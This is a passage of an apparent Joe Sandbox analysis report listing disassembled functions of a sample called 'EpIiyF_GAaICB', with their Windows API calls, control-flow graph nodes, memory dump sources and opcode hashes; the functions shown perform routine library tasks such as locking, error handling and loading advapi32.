                                                  control_flow_graph 1295 d61730-d6173e 1296 d61746-d6175f LoadLibraryExW 1295->1296 1297 d61740-d61742 1295->1297 1299 d61761-d6176c SystemFunction036 1296->1299 1300 d6176e-d61770 1296->1300 1298 d61744 1297->1298 1297->1299 1298->1300 1299->1300 1301 d61771-d61772 1299->1301
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,00DD40E8,00D3F52F,00D61677,00D3F527,00000008), ref: 00D61752
                                                  • SystemFunction036.ADVAPI32(5004C483,4BE85756), ref: 00D61765
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: Function036LibraryLoadSystem
                                                  • String ID: advapi32.dll
                                                  • API String ID: 2636843464-4050573280
                                                  • Opcode ID: 1f844133e5ff87bac1545a7093557911baa7112e46bf643765d0c53e2e0a5962
                                                  • Instruction ID: 9a6e8b4ec755788c46487a830c9093cde8c02fa52c56044dc4cb00bb038dac78
                                                  • Opcode Fuzzy Hash: 1f844133e5ff87bac1545a7093557911baa7112e46bf643765d0c53e2e0a5962
                                                  • Instruction Fuzzy Hash: EBE0803558172CE7CB216B459E45BE53B599F00765F2D0122FE546B250D7B0DC4986F0
                                                  Function 00D3C640 Relevance: 4.6, APIs: 3, Instructions: 130COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1302 d3c640-d3c65c TryAcquireSRWLockExclusive 1303 d3c678-d3c686 call d3c4b0 1302->1303 1304 d3c65e-d3c665 1302->1304 1306 d3c667-d3c673 ReleaseSRWLockExclusive 1303->1306 1307 d3c688-d3c697 1303->1307 1304->1306 1304->1307 1311 d3c80c-d3c810 1306->1311 1309 d3c6f9-d3c722 1307->1309 1310 d3c699-d3c6ac call d560e0 1307->1310 1313 d3c724-d3c734 1309->1313 1314 d3c73d-d3c776 call cec110 1309->1314 1315 d3c6b1-d3c6f4 call d560e0 * 3 1310->1315 1316 d3c813-d3c816 1313->1316 1317 d3c73a 1313->1317 1321 d3c780-d3c79b call d53eb0 1314->1321 1315->1309 1317->1314 1327 d3c79d-d3c7a4 1321->1327 1329 d3c7a6-d3c7a8 1327->1329 1330 d3c7cd-d3c7dd call d3b820 1327->1330 1331 d3c7b0-d3c7cb call d53eb0 1329->1331 1336 d3c7e7-d3c809 ReleaseSRWLockExclusive 1330->1336 1337 d3c7df-d3c7e2 call d3b9a0 1330->1337 1331->1330 1336->1311 1337->1336
                                                  APIs
                                                  • TryAcquireSRWLockExclusive.KERNEL32 ref: 00D3C651
                                                  • ReleaseSRWLockExclusive.KERNEL32 ref: 00D3C66A
                                                  • ReleaseSRWLockExclusive.KERNEL32 ref: 00D3C7F4
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: ExclusiveLock$Release$Acquire
                                                  • String ID:
                                                  • API String ID: 1021914862-0
                                                  • Opcode ID: 26c3579c478f19e469ad7f2739e741bbdea4795709f141cfa51c7a01ce19c247
                                                  • Instruction ID: 5629b76dab30ae07e1fb3f0d1161d8aeb9719f0e8752d3ef27959b420956c08e
                                                  • Opcode Fuzzy Hash: 26c3579c478f19e469ad7f2739e741bbdea4795709f141cfa51c7a01ce19c247
                                                  • Instruction Fuzzy Hash: B65125B1808B818BE702AF38D8453A9FFE0BF55304F08972DD88596252DB71A5D8C7E2
                                                  Function 00D5F780 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1399 d5f780-d5f784 call d615a0 1401 d5f789-d5f793 1399->1401 1402 d5f795-d5f797 1401->1402 1403 d5f79b-d5f7af GetCurrentProcess IsWow64Process 1401->1403 1404 d5f799 1402->1404 1405 d5f7ba-d5f7c6 1402->1405 1406 d5f7b1-d5f7b8 1403->1406 1407 d5f7c8 1403->1407 1408 d5f7d2 1404->1408 1409 d5f7d4-d5f7d8 1405->1409 1406->1405 1406->1408 1407->1408 1408->1409
                                                  APIs
                                                    • Part of subcall function 00D615A0: TryAcquireSRWLockExclusive.KERNEL32(00DD40E0,3BE85000,00D3F4FF,00D5F789,3BE85000,00D3F527,%s:%d: assertion %s failed: %s,..\..\buildtools\third_party\libc++\trunk\include\string,000006C6,__s < __min_cap,__s should never be greater than or equal to the short string capacity,016A0CC4,00EC45C7,00D3F543,00000000,00D3F543), ref: 00D615A9
                                                    • Part of subcall function 00D615A0: ReleaseSRWLockExclusive.KERNEL32(00DD40E0), ref: 00D615CD
                                                  • GetCurrentProcess.KERNEL32(3BE85000,00D3F527,%s:%d: assertion %s failed: %s,..\..\buildtools\third_party\libc++\trunk\include\string,000006C6,__s < __min_cap,__s should never be greater than or equal to the short string capacity,016A0CC4,00EC45C7,00D3F543,00000000,00D3F543,00D552E7,016A0CC4,00EC45C7), ref: 00D5F79B
                                                  • IsWow64Process.KERNEL32(00000000,00DC3F30), ref: 00D5F7A7
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: ExclusiveLockProcess$AcquireCurrentReleaseWow64
                                                  • String ID:
                                                  • API String ID: 2898688079-0
                                                  • Opcode ID: 878f0b4c46bb74e5b0c992ed8e3d91c9494a9f4ab88a070b6ca32a150e144a5d
                                                  • Instruction ID: a3fb41a983d47f53d2447fda4badee5f75b5a0cd1d91b631ca9d0510f691faa8
                                                  • Opcode Fuzzy Hash: 878f0b4c46bb74e5b0c992ed8e3d91c9494a9f4ab88a070b6ca32a150e144a5d
                                                  • Instruction Fuzzy Hash: 33E06532A2075387DA5057B9AD04B5532ACAB18762F484677FC06DB3A4E764DD0887B4
                                                  Function 00D615A0 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1410 d615a0-d615b1 TryAcquireSRWLockExclusive 1411 d615b3-d615ba 1410->1411 1412 d615d8-d615e9 call d3c4b0 1410->1412 1413 d615bc-d615d7 call d616c0 ReleaseSRWLockExclusive 1411->1413 1414 d615eb-d615f0 call d61640 1411->1414 1412->1413 1412->1414 1419 d615f5-d615fc 1414->1419 1419->1413
                                                  APIs
                                                  • TryAcquireSRWLockExclusive.KERNEL32(00DD40E0,3BE85000,00D3F4FF,00D5F789,3BE85000,00D3F527,%s:%d: assertion %s failed: %s,..\..\buildtools\third_party\libc++\trunk\include\string,000006C6,__s < __min_cap,__s should never be greater than or equal to the short string capacity,016A0CC4,00EC45C7,00D3F543,00000000,00D3F543), ref: 00D615A9
                                                  • ReleaseSRWLockExclusive.KERNEL32(00DD40E0), ref: 00D615CD
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: ExclusiveLock$AcquireRelease
                                                  • String ID:
                                                  • API String ID: 17069307-0
                                                  • Opcode ID: 70228e6419b143616eccc6b38d9529d94ec2f2b3fec1a7ae07925be0ac62b47c
                                                  • Instruction ID: 3da9b6b22c28608d46cd9d7ade392f52b5d1529f31a161fae3290d10f2689f85
                                                  • Opcode Fuzzy Hash: 70228e6419b143616eccc6b38d9529d94ec2f2b3fec1a7ae07925be0ac62b47c
                                                  • Instruction Fuzzy Hash: 90E06D6D6053605BD710A7E668193B67B5087813E5F0CC17BE3C3D23A1CAB0886887B2
                                                  Function 00D7AB9B Relevance: 2.6, APIs: 2, Instructions: 67COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLastError.KERNEL32(00000000,00000001,00D70D31,00D77CF4,00DBF1E8,00000028,00D72C0C,00000016,00D7AB04,?,?), ref: 00D7AB9F
                                                  • SetLastError.KERNEL32(00000000,?,00000009,000000FF,?,?), ref: 00D7AC41
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast
                                                  • String ID:
                                                  • API String ID: 1452528299-0
                                                  • Opcode ID: 588ab88204b34fc6fc47f17cb12c37c65b78a39a4361f1cc6eb329eb2c898c59
                                                  • Instruction ID: a186b78837eadb88f807a98de65e04161248b2b38fcac1ec4444b86b8cbaa330
                                                  • Opcode Fuzzy Hash: 588ab88204b34fc6fc47f17cb12c37c65b78a39a4361f1cc6eb329eb2c898c59
                                                  • Instruction Fuzzy Hash: FB11A93170A312BFD6122BA8EDC6F6F2A99DB84379B144225F50DD11A2F7548C049176
                                                  Function 05696CAC Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateActCtxA.KERNEL32(?), ref: 05698341
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4447221608.0000000005690000.00000040.00000800.00020000.00000000.sdmp, Offset: 05690000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_5690000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  • Opcode ID: 005171c7e8a897872158a8ae70ae9221d3f64c165a50f6d339178ffd52d2b6f9
                                                  • Instruction ID: 0e20253cf8c1923f3f76db559c43bdfc79e626b7b02f5847799ac6e9df4a9add
                                                  • Opcode Fuzzy Hash: 005171c7e8a897872158a8ae70ae9221d3f64c165a50f6d339178ffd52d2b6f9
                                                  • Instruction Fuzzy Hash: 7E41B0B1C0071DCADB24CFA9C884B9DFBB5BF45304F20806AD409AB255DBB56946CF91
                                                  Function 0569828F Relevance: 1.6, APIs: 1, Instructions: 91COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateActCtxA.KERNEL32(?), ref: 05698341
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4447221608.0000000005690000.00000040.00000800.00020000.00000000.sdmp, Offset: 05690000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_5690000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  • Opcode ID: a52bb93fa29321bc38f699324b16f704f93ecf905b8c63712e6349507f956160
                                                  • Instruction ID: bcbd6c5991d049ebbd9c62ba214816d0d85c54810c33b144f32e85514ccd48a3
                                                  • Opcode Fuzzy Hash: a52bb93fa29321bc38f699324b16f704f93ecf905b8c63712e6349507f956160
                                                  • Instruction Fuzzy Hash: 2341DFB1C0071DCADB24CFA9C884BDDFBB5BF49304F20806AD409AB255DBB5694ACF91
                                                  Function 070FA321 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 070FA3AF
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4447776421.00000000070F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_70f0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: 26380f6fb1e3146ed837f2e59702879db12f83e75198059a83229924ef8a2edd
                                                  • Instruction ID: 4f58bf3cb9c558be7ca72917a3f90a52c5641de1d20477bd016f2cfdc8b958d7
                                                  • Opcode Fuzzy Hash: 26380f6fb1e3146ed837f2e59702879db12f83e75198059a83229924ef8a2edd
                                                  • Instruction Fuzzy Hash: 432116B5D00209AFDB10CF9AD885ADEBFF8EB48320F14841AE918B3310C374A944CFA1
                                                  Function 05698284 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateActCtxA.KERNEL32(?), ref: 05698341
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4447221608.0000000005690000.00000040.00000800.00020000.00000000.sdmp, Offset: 05690000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_5690000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  • Opcode ID: 257d6ed0b09bffc76682494e5ad8913bcfdd9465383ac4ba251815e24163067e
                                                  • Instruction ID: 48f55d2ba6f14b81578b49602a4ba7653dec97298333aeabb4df4160f1d9b115
                                                  • Opcode Fuzzy Hash: 257d6ed0b09bffc76682494e5ad8913bcfdd9465383ac4ba251815e24163067e
                                                  • Instruction Fuzzy Hash: D52119B1D0070DCADF15DFA8C888BEDBBB5BF46308F108059D405AB254CBB56946CF51
                                                  Function 070FA328 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 070FA3AF
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4447776421.00000000070F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_70f0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: fdcac0b1dc027e45990f589ccb7f3b3b4dfab956d626bbd2d8d0f54b142a4928
                                                  • Instruction ID: 465e0357c785bf699459b42922ea07d68960edc552d879db059597e2cf2b8b7f
                                                  • Opcode Fuzzy Hash: fdcac0b1dc027e45990f589ccb7f3b3b4dfab956d626bbd2d8d0f54b142a4928
                                                  • Instruction Fuzzy Hash: E521C4B5D00259AFDB10CF9AD984ADEBBF8EB48320F14841AE918A3310D374A955CFA5
                                                  Function 070FE338 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 070FE3AD
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4447776421.00000000070F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_70f0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: CallbackDispatcherUser
                                                  • String ID:
                                                  • API String ID: 2492992576-0
                                                  • Opcode ID: 93ae517f561eb8168b27670fac5a15d3eb0971cd473da16b4bc12486c7cae0f1
                                                  • Instruction ID: 09bf7826e63a3d946fdb20ae07c852d6b3946c7b211a6eb4db58e23c9704068b
                                                  • Opcode Fuzzy Hash: 93ae517f561eb8168b27670fac5a15d3eb0971cd473da16b4bc12486c7cae0f1
                                                  • Instruction Fuzzy Hash: 402103F180839A8FDB11CF65C4097DEBFF4EB05325F14849AD588B7682C7799648CBA1
                                                  Function 00CECEC4 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetInstallDetailsPayload.MSEDGE_ELF(?,%s:%d: assertion %s failed: %s,..\..\buildtools\third_party\libc++\trunk\include\string,00000387,__s != nullptr,basic_string(const char*) detected nullptr,?,00000000,00CECC06,?,00D3F08B,extended,?), ref: 00CECEC7
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: DetailsInstallPayload
                                                  • String ID:
                                                  • API String ID: 3030567736-0
                                                  • Opcode ID: 6ad3cca6fcde2f4e2ff3b095fd1a7adedf95ac3e297b936337139fdfdb417504
                                                  • Instruction ID: 00aece868307f3367e45afc6beaa420acfa9df62a2786cd02117a242b2b59fa5
                                                  • Opcode Fuzzy Hash: 6ad3cca6fcde2f4e2ff3b095fd1a7adedf95ac3e297b936337139fdfdb417504
                                                  • Instruction Fuzzy Hash: 9FB012B2C0030C97850037F83C0A527370C4960120B440032F50D86752ED59E05042F6
                                                  Function 0551D0DC Relevance: .1, Instructions: 72COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446972307.000000000551D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0551D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_551d000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4f9fc03686be57af3cd10a3369efb6718de7d0c783bcca775d5df70c8919c26a
                                                  • Instruction ID: 2ee163f23bc27def2462d74acace3141a9bb1382300e84e02d650ff44b607e11
                                                  • Opcode Fuzzy Hash: 4f9fc03686be57af3cd10a3369efb6718de7d0c783bcca775d5df70c8919c26a
                                                  • Instruction Fuzzy Hash: 1F21F2B1544244EFEB04DF24D9C0B26BFB6FB84314F24C96DDD094B256C33AD846CAA5
                                                  Function 0551D01C Relevance: .1, Instructions: 65COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446972307.000000000551D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0551D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_551d000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fcbd49215062c5fb97da42e8a4f5ba657ba830397ddb9c9080b48855a7140398
                                                  • Instruction ID: c875575f7a374c10589bf24b0691bbf4ceb76170494dff77ff3cf778bf14c8ae
                                                  • Opcode Fuzzy Hash: fcbd49215062c5fb97da42e8a4f5ba657ba830397ddb9c9080b48855a7140398
                                                  • Instruction Fuzzy Hash: CF1103B19042449FEB14DF38D9C4B26BFB6FB84204F608E6DDC094B241E33AE447C6A6
                                                  Function 0551D006 Relevance: .1, Instructions: 55COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446972307.000000000551D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0551D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_551d000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ebc19b2d93623c59a6693ed367878352370892283d9a2b1a62913d5abe54a7f2
                                                  • Instruction ID: e2aaf715082faad342e4cc02d8bb76a1a62c822c2b1e9924e51da64312b357df
                                                  • Opcode Fuzzy Hash: ebc19b2d93623c59a6693ed367878352370892283d9a2b1a62913d5abe54a7f2
                                                  • Instruction Fuzzy Hash: 85110AB14497C48FEB16DF24D984B15BFB1FB41314F2589EAC8898B253D33E944AC762
                                                  Function 05503006 Relevance: .1, Instructions: 54COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446895714.0000000005503000.00000040.00000800.00020000.00000000.sdmp, Offset: 05503000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_5503000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 88e5a9921e27b300506116c67ba6673cb21f8a901ff78ce3aaa1f9d8dfea1dc6
                                                  • Instruction ID: aac80f133f0b8bd38a11552c2c1773cd20f3bc7af5e8ffdb3eab3c94b57ddd91
                                                  • Opcode Fuzzy Hash: 88e5a9921e27b300506116c67ba6673cb21f8a901ff78ce3aaa1f9d8dfea1dc6
                                                  • Instruction Fuzzy Hash: C01194715097C09FE712CF15D894B62BFB8EB45720F09889AE9858B792C37C9845CB71
                                                  Function 0550301C Relevance: .1, Instructions: 53COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446895714.0000000005503000.00000040.00000800.00020000.00000000.sdmp, Offset: 05503000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_5503000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9c885f0ecff465033fc15e67e9274f9665a987fb879bc982a5edba4825a50a04
                                                  • Instruction ID: de4c9ccfc6f59680985b1bcc84ae2f8e05422a5300977c4d48a215af48cc2303
                                                  • Opcode Fuzzy Hash: 9c885f0ecff465033fc15e67e9274f9665a987fb879bc982a5edba4825a50a04
                                                  • Instruction Fuzzy Hash: E911A0B1505A44DAEB10CB49D884B27FBE8FB44B20F14CC6EE9495B741C379A845CBB1
                                                  Function 0551D0D7 Relevance: .1, Instructions: 53COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446972307.000000000551D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0551D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_551d000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e64fc474496645f77accdbd1a3ad286c5c0c617209a35917f0f7eb2d8cd15d48
                                                  • Instruction ID: 935d5b571c8d394d6f6a495609d8b025220da3d6488565c99c8068e889037253
                                                  • Opcode Fuzzy Hash: e64fc474496645f77accdbd1a3ad286c5c0c617209a35917f0f7eb2d8cd15d48
                                                  • Instruction Fuzzy Hash: D311DD76544280DFEB05CF14D9C4B25BFB2FB84314F28C6A9DC494B656C33AD44ACBA1
                                                  Function 057801A0 Relevance: .0, Instructions: 7COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4447654801.0000000005780000.00000040.00000800.00020000.00000000.sdmp, Offset: 05780000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_5780000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0c5aa06abd19b972ef5ffdcdd9d868785c862436591dc722b60b57511d1520ba
